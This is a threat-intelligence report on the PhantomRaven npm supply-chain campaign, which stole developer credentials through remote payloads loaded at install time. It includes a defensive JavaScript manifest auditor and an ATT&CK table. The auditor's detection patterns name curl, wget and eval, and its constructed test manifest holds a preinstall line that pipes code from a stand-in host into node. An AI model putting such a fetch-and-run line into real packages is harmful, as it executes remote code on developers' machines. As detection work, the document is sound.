EXECUTIVE SUMMARY
The PhantomRaven campaign shows how attackers abuse the open-source npm ecosystem to target developers and development environments. In this campaign, many malicious npm packages were uploaded that looked like normal libraries but secretly contained code designed to collect sensitive information from developer systems. These packages were downloaded thousands of times, which increased the chance of developers unknowingly installing them in their projects. Once installed, the packages attempted to collect credentials and tokens commonly used in development workflows, such as those for source code repositories and automated build systems. This type of attack focuses on the software supply chain: attackers target the tools and dependencies used to build applications rather than the finished application itself. Developers often trust packages published in open-source repositories and use automated tools to install dependencies, which makes it easier for malicious packages to spread. Researchers observed that the campaign involved many packages published under different names, which helped them avoid quick detection. Even after some packages were removed, new ones were uploaded with similar behavior, which allowed the activity to continue.
The malicious npm packages used a method that hid the harmful code from normal package inspection. Instead of including the full malicious code inside the package, the attackers used external sources to load additional code during installation. When a developer installed one of these packages, the installation process triggered a script that downloaded the real payload from an attacker-controlled server. Because the main code was not stored directly in the npm package, the package could appear harmless during basic review. Once the external payload was downloaded, it executed on the developer's system and began collecting different types of information. The malware searched for environment variables, configuration files, and authentication tokens used by development tools. It also gathered system details such as hostname, operating system information, and network-related data to identify the infected machine. After collecting the information, the data was sent to attacker-controlled servers. This approach made detection more difficult because the harmful behavior happened after installation rather than being visible to static package analysis.
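As an added example (not code from the original report), the check below audits an npm package.json for the two manifest features that can pull code from outside the registry during installation: lifecycle scripts that fetch and run remote content, and dependency specifiers given as URLs. The sample manifests and the payload.invalid host are constructed for the demonstration; flagging URL dependencies goes beyond what the report describes and is included as a general hardening check.

```javascript
// Added example (not from the original report): audit an npm package.json for
// code that would be pulled from outside the registry at install time. Two
// manifest features can do this: lifecycle scripts that fetch and run remote
// content, and dependency specifiers that are URLs rather than registry versions.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
// Indicators that a lifecycle script reaches the network or evaluates code it did not ship with.
const FETCH_PATTERNS = [
  /https?:\/\//i,                       // hard-coded URL
  /\b(curl|wget)\b/i,                   // shell downloaders
  /\bnode\s+-e\b/i,                     // inline JavaScript execution
  /\b(fetch|eval)\(|\bhttps?\.get\(/i,  // in-script download or eval
];
// Returns a list of findings; an empty list means no install-time remote loading was seen.
function auditManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    const hits = FETCH_PATTERNS.filter((re) => re.test(command)).map((re) => re.source);
    if (hits.length > 0) {
      findings.push({ kind: "lifecycle-script", hook, command, hits });
    }
  }
  for (const field of ["dependencies", "devDependencies", "optionalDependencies"]) {
    for (const [name, spec] of Object.entries(manifest[field] || {})) {
      // A URL specifier resolves to a tarball or repository that bypasses the registry.
      if (/^(git\+)?https?:\/\/|^git:\/\//i.test(spec)) {
        findings.push({ kind: "remote-dependency", field, name, spec });
      }
    }
  }
  return findings;
}

// Constructed manifests: one ordinary library and one that loads code remotely.
const BENIGN_MANIFEST = {
  name: "example-benign", version: "1.0.0",
  scripts: { test: "node test.js", postinstall: "node scripts/build.js" },
  dependencies: { lodash: "^4.17.21" },
};
const SUSPICIOUS_MANIFEST = {
  name: "example-suspicious", version: "1.0.0",
  scripts: { preinstall: "curl -s http://payload.invalid/stage2.js | node" },
  dependencies: { helper: "http://payload.invalid/helper.tgz" },
};

console.log(JSON.stringify(auditManifest(SUSPICIOUS_MANIFEST), null, 2));
```

Pair a check like this with `ignore-scripts=true` in the project's .npmrc for CI installs, which stops lifecycle scripts from running at all.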
The PhantomRaven campaign highlights the risks in modern software development environments that rely heavily on open-source packages. When developers install third-party dependencies, they may unknowingly introduce malicious code into their systems and development pipelines. In this campaign, attackers focused on stealing credentials and tokens used by developers, which could allow further access to code repositories and build systems. If such access is obtained, attackers could potentially modify software code or gain deeper access into development infrastructure. The repeated publishing of malicious packages also showed that the activity continued even after earlier packages were detected and removed. This pattern suggests that attackers can quickly create new packages to replace the ones that were taken down. The campaign also shows that common security checks may not detect threats that load code from external sources during installation. Because modern development workflows often include automated dependency downloads, even a small malicious package can spread across many projects. Overall, the activity demonstrates how supply chain attacks can target developers directly and why monitoring package behavior and dependencies is important in open-source environments.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-Technique |
|---|---|---|---|
| Initial Access | T1195.002 | Supply Chain Compromise | Compromise Software Supply Chain |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Execution | T1204.002 | User Execution | Malicious File |
| Credential Access | T1552.001 | Unsecured Credentials | Credentials In Files |
| Discovery | T1082 | System Information Discovery | — |
| Discovery | T1016 | System Network Configuration Discovery | — |
| Collection | T1119 | Automated Collection | — |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
REFERENCES:
The following reports contain further technical details: